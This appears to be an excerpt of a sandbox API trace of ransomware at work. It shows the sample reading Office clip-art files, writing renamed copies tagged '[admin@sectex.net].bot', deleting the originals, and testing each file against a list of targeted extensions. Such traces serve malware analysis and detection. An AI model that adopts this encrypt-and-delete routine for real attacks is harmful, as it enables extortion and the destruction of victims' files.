	[0163.485] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.485] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.485] GetLastError () returned 0x0
	[0163.485] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x955d, lpOverlapped=0x0) returned 1
	[0163.642] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x9560, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x9560, lpOverlapped=0x0) returned 1
	[0163.644] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.644] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.644] SetEndOfFile (hFile=0x37c) returned 1
	[0163.644] CloseHandle (hObject=0x37c) returned 1
	[0163.644] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.644] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.647] CloseHandle (hObject=0x3e8) returned 1
	[0163.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.649] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg")) returned 1
	[0163.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.650] lstrlenW (lpString=".doc") returned 4
	[0163.650] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.650] lstrlenW (lpString=".docx") returned 5
	[0163.650] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.650] lstrlenW (lpString=".pdf") returned 4
	[0163.650] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.650] lstrlenW (lpString=".xls") returned 4
	[0163.650] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.651] lstrlenW (lpString=".xlsx") returned 5
	[0163.651] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.651] lstrlenW (lpString=".ppt") returned 4
	[0163.651] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString=".zip") returned 4
	[0163.651] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.651] lstrlenW (lpString=".rar") returned 4
	[0163.651] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.651] lstrlenW (lpString=".bz2") returned 4
	[0163.651] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.651] lstrlenW (lpString=".7z") returned 3
	[0163.651] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString=".dbf") returned 4
	[0163.651] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString=".1cd") returned 4
	[0163.651] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString=".jpg") returned 4
	[0163.651] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.651] lstrlenW (lpString=".doc") returned 4
	[0163.652] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.652] lstrlenW (lpString=".docx") returned 5
	[0163.652] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.652] lstrlenW (lpString=".pdf") returned 4
	[0163.652] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.652] lstrlenW (lpString=".xls") returned 4
	[0163.652] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.652] lstrlenW (lpString=".xlsx") returned 5
	[0163.652] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.652] lstrlenW (lpString=".ppt") returned 4
	[0163.652] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.652] lstrlenW (lpString=".zip") returned 4
	[0163.652] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.652] lstrlenW (lpString=".rar") returned 4
	[0163.652] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.652] lstrlenW (lpString=".bz2") returned 4
	[0163.652] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.652] lstrlenW (lpString=".7z") returned 3
	[0163.652] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.652] lstrlenW (lpString=".dbf") returned 4
	[0163.652] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.652] lstrlenW (lpString=".1cd") returned 4
	[0163.652] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG") returned 63
	[0163.652] lstrlenW (lpString=".jpg") returned 4
	[0163.652] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.653] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.653] lstrlenW (lpString="J0150150.WMF") returned 12
	[0163.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.653] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=46404) returned 1
	[0163.653] CloseHandle (hObject=0x3e8) returned 1
	[0163.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf")) returned 0x20
	[0163.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.654] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.654] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.655] GetLastError () returned 0x0
	[0163.655] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xb544, lpOverlapped=0x0) returned 1
	[0163.814] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xb550, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xb550, lpOverlapped=0x0) returned 1
	[0163.816] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.816] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.816] SetEndOfFile (hFile=0x37c) returned 1
	[0163.816] CloseHandle (hObject=0x37c) returned 1
	[0163.816] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.816] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.819] CloseHandle (hObject=0x3e8) returned 1
	[0163.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.386] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf")) returned 1
	[0164.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.387] lstrlenW (lpString=".doc") returned 4
	[0164.387] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString=".docx") returned 5
	[0164.387] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0164.387] lstrlenW (lpString=".pdf") returned 4
	[0164.387] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString=".xls") returned 4
	[0164.387] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.387] lstrlenW (lpString=".xlsx") returned 5
	[0164.387] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0164.387] lstrlenW (lpString=".ppt") returned 4
	[0164.387] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.387] lstrlenW (lpString=".zip") returned 4
	[0164.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.387] lstrlenW (lpString=".rar") returned 4
	[0164.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString=".bz2") returned 4
	[0164.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString=".7z") returned 3
	[0164.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.387] lstrlenW (lpString=".dbf") returned 4
	[0164.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".1cd") returned 4
	[0164.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".jpg") returned 4
	[0164.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".doc") returned 4
	[0164.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString=".docx") returned 5
	[0164.388] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0164.388] lstrlenW (lpString=".pdf") returned 4
	[0164.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString=".xls") returned 4
	[0164.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.388] lstrlenW (lpString=".xlsx") returned 5
	[0164.388] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0164.388] lstrlenW (lpString=".ppt") returned 4
	[0164.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".zip") returned 4
	[0164.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.388] lstrlenW (lpString=".rar") returned 4
	[0164.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString=".bz2") returned 4
	[0164.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString=".7z") returned 3
	[0164.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".dbf") returned 4
	[0164.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.388] lstrlenW (lpString=".1cd") returned 4
	[0164.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned 63
	[0164.389] lstrlenW (lpString=".jpg") returned 4
	[0164.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.389] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.389] lstrlenW (lpString="J0152432.WMF") returned 12
	[0164.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.600] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=16492) returned 1
	[0164.600] CloseHandle (hObject=0x3d0) returned 1
	[0164.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf")) returned 0x20
	[0164.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.609] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.609] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.610] GetLastError () returned 0x0
	[0164.610] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x406c, lpOverlapped=0x0) returned 1
	[0164.627] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4070, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4070, lpOverlapped=0x0) returned 1
	[0164.628] ReadFile (in: hFile=0x3a8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.628] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.629] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.629] CloseHandle (hObject=0x1b4) returned 1
	[0164.629] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.629] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.631] CloseHandle (hObject=0x3a8) returned 1
	[0164.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf")) returned 1
	[0164.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.632] lstrlenW (lpString=".doc") returned 4
	[0164.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.632] lstrlenW (lpString=".docx") returned 5
	[0164.632] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0164.632] lstrlenW (lpString=".pdf") returned 4
	[0164.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.632] lstrlenW (lpString=".xls") returned 4
	[0164.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.632] lstrlenW (lpString=".xlsx") returned 5
	[0164.632] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0164.632] lstrlenW (lpString=".ppt") returned 4
	[0164.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.632] lstrlenW (lpString=".zip") returned 4
	[0164.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.632] lstrlenW (lpString=".rar") returned 4
	[0164.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString=".bz2") returned 4
	[0164.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString=".7z") returned 3
	[0164.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString=".dbf") returned 4
	[0164.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString=".1cd") returned 4
	[0164.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString=".jpg") returned 4
	[0164.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString=".doc") returned 4
	[0164.633] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString=".docx") returned 5
	[0164.633] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0164.633] lstrlenW (lpString=".pdf") returned 4
	[0164.633] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString=".xls") returned 4
	[0164.633] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.633] lstrlenW (lpString=".xlsx") returned 5
	[0164.633] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0164.633] lstrlenW (lpString=".ppt") returned 4
	[0164.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.633] lstrlenW (lpString=".zip") returned 4
	[0164.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.633] lstrlenW (lpString=".rar") returned 4
	[0164.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.634] lstrlenW (lpString=".bz2") returned 4
	[0164.634] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.634] lstrlenW (lpString=".7z") returned 3
	[0164.634] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.634] lstrlenW (lpString=".dbf") returned 4
	[0164.634] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.634] lstrlenW (lpString=".1cd") returned 4
	[0164.634] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned 63
	[0164.634] lstrlenW (lpString=".jpg") returned 4
	[0164.634] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.634] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.634] lstrlenW (lpString="J0152560.WMF") returned 12
	[0164.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.635] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=10880) returned 1
	[0164.635] CloseHandle (hObject=0x3a8) returned 1
	[0164.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf")) returned 0x20
	[0164.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.635] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.635] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
